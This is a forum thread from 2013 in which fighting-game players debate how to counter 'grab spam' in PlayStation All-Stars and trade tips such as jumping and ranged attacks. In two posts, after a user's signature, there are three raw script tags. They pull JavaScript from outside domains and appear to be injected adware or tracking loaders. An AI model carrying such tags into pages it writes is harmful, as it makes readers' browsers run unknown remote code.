Wastelander
573 posts

Re: There's no words to describe how much I hate people who run around a grab

Feb 9, 2013

Roll, then attack the place behind you because the player would probably try to go for another grab. Also, when the enemy is trying to grab you, it'll leave them in a vulnerable spot for you to bring up a KC on them.

photo 4ea25363-6969-4d43-97fa-d3b44926e8da_zpsed248ee0.gif
Message 11 of 41 (192 Views)
0 Likes
Lombax Warrior
132 posts

Feb 9, 2013

coreno wrote:

Unforunately grab spam is difficult to deal with, but forunately, I don't see it often. The best defense is ranged attacks, and close ranged attacks immeadiately following a failed grab.

If there are other players in the arena, just avoid the grabber until they change their tactics. Also, supers always override a grab Smiley Wink

Thank you for the responce. Somebody who doesn't think they are a pro like everyone else in this thread and realizes grab spamming is actually annoying. This forum is beyond cocky as whole

Message 12 of 41 (186 Views)
0 Likes
Highlighted
Fender Bender
2516 posts

Feb 9, 2013

Here's a counter: Move out of their range. If you're constantly being thrown its because you're constantly within their attack range.

Seriously though? Get used to it. People complain about stupid stuff on here all the time because, get this: They're not good enough to get past it and they complain that they're not winning.

I once fought a Ratchet who constantly spammed Sniper over and over. He did it in a way that made it impossible for my Dante to get in. It was worse that it was on Dojo of all stages, and that the 'other' Dante was just fighting me completely unaware we were both getting gunned down hard, and the Ratchet got a Level 3 and won the match. Easily. We weren't able to do anything. So what did I do? I can tell you what I didn't do: Complain. Whine. The game isn't supposed to be easy. Just because I lose against a good strategy does not mean I am unable to 'overcome' that strategy through hard work and dedication.

If people don't want to put in the hard work and dedication, they're likely the first people to complain. My local Gamestop manager once told me that the word 'cheap' has been cheapened by the people who are too lazy to learn how to win. They pretty much get in bad moods due to a guy who, over the internet, won a match in a video game, and they didn't. I could bet some hard cash you started this post in an angry mood, and didn't want to accept the loss so you decided "Hey, the other guy was making sure I didn't get a super, so CLEARLY he was cheating!" instead of deciding, what most of us civilized fighters think, "I must have messed up on a few of my attacks. He was getting in close, so I should have put a distance between us and used a few projectiles."

Unless he instantly teleports to wherever you are and throws you, and that throw puts you from a Level 2 to a Level 0 instantly.

Message 13 of 41 (172 Views)
Lombax Warrior
233 posts

Feb 9, 2013
A counter? It's called the square button. Seriously, I've played you before. You're better than this.
Message 14 of 41 (164 Views)
0 Likes
Fender Bender
3580 posts

Feb 9, 2013
@ULT_UNTAMEDBEAST

I don't see myself as a pro. I play for fun. That's it. However, you need to get used to this happening. There will always be a spammer. MarrowOchi summed it up best.
Message 15 of 41 (154 Views)
0 Likes
Gaming Beast
2167 posts

[ Edited ]
Feb 9, 2013

ATL_UNTAMEDBEAST wrote:

No, it's incrediblly cheap and takes no skill. It's unblockable  and unavoidable, and takes priority over every move in the game If you do it you've proven to be an awful player.

Ummm what? You can jump, you can grab break, you can hit them so long as you hit them before their grab hits you, you can kill them with a level 2... I mean there's quite a few ways around a grab.

Hell, if you're having that many problems with grabs, just jump whenever the opponent gets within grab range. Jumps make you unable to be grabbed from frame 1.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 16 of 41 (144 Views)
0 Likes
Lombax Warrior
132 posts

Feb 9, 2013

Just now i ended up in a stock game, me and a cole the last 2. Both 2 stocks. I was destroying him and the only way he could even hit me is grabbing... Grabbing is way to powerful. The need either a longer stun or longer period between grabs because you can spam it for DAYS

Message 17 of 41 (142 Views)
0 Likes
Gaming Beast
2167 posts

Feb 9, 2013

ATL_UNTAMEDBEAST wrote:

Just now i ended up in a stock game, me and a cole the last 2. Both 2 stocks. I was destroying him and the only way he could even hit me is grabbing... Grabbing is way to powerful. The need either a longer stun or longer period between grabs because you can spam it for DAYS

You can but it's uneffective. I personally wouldn't mind a longer cooldown on grabs, but at the same time it is the best way to punish landing lag. That being said, spamming grab means getting raped by aerials.

If you played a match where the only times you got hit in 2 stocks was when you got grabbed, then I'm going to assume you block too much. One might even be able to say something along the lines of "You spam block. It's OP since the only way I was able to hit him during 2 stocks where he spammed block was with grabs.".

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 18 of 41 (136 Views)
Fender Bender
2516 posts

Feb 9, 2013

You don't gain any AP for grabbing though.

I don't even go online. I find online utterly boring. I get people like Toriko sending me invites every 5 seconds after I log on and I'm like "PLEASE JEEBUS LEAVE ME ALONE I DON'T LIKE ONLINE.'

I play Combat Trials constantly. On All-Star difficulty. Why? Because...real talk... the **bleep** AI's have more skill than a good portion of people. There is nothing more irritating than having to sit there and go through the monotone process of blocking a Kratos chain grab then walking up and smacking him around for a bit because he's an idiot for spamming such an easy to counter move.

All you gotta learn, to be any good at this game, is that people are going to spam what they spam best. The key is to force their spam to go back and force them to think differently. See a guy coming for a grab? Jump. Seriously, grabs can't catch jumps.

Message 19 of 41 (123 Views)
0 Likes
Lombax Warrior
132 posts

Feb 9, 2013

MarrowOchi wrote:

You don't gain any AP for grabbing though.

I don't even go online. I find online utterly boring. I get people like Toriko sending me invites every 5 seconds after I log on and I'm like "PLEASE JEEBUS LEAVE ME ALONE I DON'T LIKE ONLINE.'

I play Combat Trials constantly. On All-Star difficulty. Why? Because...real talk... the **bleep** AI's have more skill than a good portion of people. There is nothing more irritating than having to sit there and go through the monotone process of blocking a Kratos chain grab then walking up and smacking him around for a bit because he's an idiot for spamming such an easy to counter move.

All you gotta learn, to be any good at this game, is that people are going to spam what they spam best. The key is to force their spam to go back and force them to think differently. See a guy coming for a grab? Jump. Seriously, grabs can't catch jumps.

Lol the highest difficulty AI is not near as good as a skilled player....

Message 20 of 41 (116 Views)